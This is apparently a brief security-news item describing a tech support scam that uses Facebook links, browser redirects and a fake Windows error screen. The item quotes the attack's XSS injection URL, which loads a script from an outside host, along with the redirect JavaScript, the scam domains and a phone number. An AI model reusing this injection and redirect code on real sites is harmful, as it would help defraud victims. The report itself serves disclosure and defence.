Researchers at Malwarebytes Labs reported that threat actors have recently been detected using links from Facebook to entice individuals to click through to a series of browser redirections, ultimately ending up on a tech support scam website that simulates a Windows error screen. Victims who end up on the error screen are asked to call a toll-free number that purports to be Microsoft Tech Support. The threat actors pretend to be associated with Microsoft and attempt to scam money from victims to remotely access the victim’s computer to “fix” the supposed issue. One of the interesting aspects of this attack was the fact that the attackers made use of a legitimate website that has a cross-site scripting (XSS) vulnerability that allowed JavaScript to be injected and use the site as an open redirect to another URL. The URL used was the following:
rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/
?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}
The JavaScript that was downloaded from buddhosi[.]com was the following:
top.location.replace(‘https://BernetteJudeTews[.]club/home/anette/?
nr=855-472-1832&’+window.location.search.substring(1));